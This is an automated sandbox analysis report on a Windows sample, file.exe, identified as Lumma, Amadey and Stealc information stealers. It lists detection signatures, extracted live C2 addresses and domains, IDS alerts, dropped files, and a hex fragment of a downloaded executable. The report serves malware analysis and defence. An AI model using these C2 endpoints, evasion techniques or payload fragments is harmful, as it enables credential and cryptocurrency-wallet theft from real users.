Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540852
MD5: 15b9109c23747163a74018275bb88207
SHA1: cea893c4f10a63a3798af5c824742ad39e361a66
SHA256: 7dc80d87936e8912142cbb6e9b30161785c4a6bf06e81675a60e2e923e4d0fef
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37 URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000005.00000002.2498410813.0000000000401000.00000040.00000001.01000000.0000000A.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 40.0.num.exe.dd0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: ee8d47a049.exe.3540.14.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["bathdoomgaz.store", "clearancek.site", "eaglepawnoy.store", "mobbipenju.store", "spirittunek.store", "licendfilteo.site", "studennotediw.store", "dissapoiznw.store"], "Build id": "LAp--Ap"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A94C1J5VAPFWM1J1FS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\LIZ1X768O6R3WBN7EPZHLFTDS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Z72A5QS1XOE2OWTBBJM669OT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49766 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50014 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50088 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50091 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000003.2460947098.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000002.2593870400.0000000000932000.00000040.00000001.01000000.0000000B.sdmp
Source: firefox.exe Memory has grown: Private usage: 0MB later: 188MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:63776 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:54249 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:49585 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:55770 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:64351 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:63537 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:57999 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:50604 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49859 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49995 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:55496 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:51930 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:52104 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:61422 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:52761 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:51560 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49996
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49999 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50008 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50009 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:59233 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:60512 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:63161 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:62865 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:52875 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:56842 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:56865 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50015 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50021 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:54710 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50024 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:55939 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:49779 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50042 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50041 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50037 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:59275 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:57453 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:53241 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:61711 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:49726 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:65334 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50090 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:61676 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:49222 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50097 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50126 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49740 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49714 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49714 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49712 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49766 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50007 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50000 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50012 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49998 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50081 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50081 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50092 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50080 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50082 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50002 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50002 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50080 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50078 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:50014 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50091 -> 104.21.53.8:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 07:07:24 GMTContent-Type: application/octet-streamContent-Length: 1911296Last-Modified: Thu, 24 Oct 2024 06:55:23 GMTConnection: keep-aliveETag: "6719ef5b-1d2a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 c0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4b 00 00 04 00 00 a9 00 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec ae 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ae 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 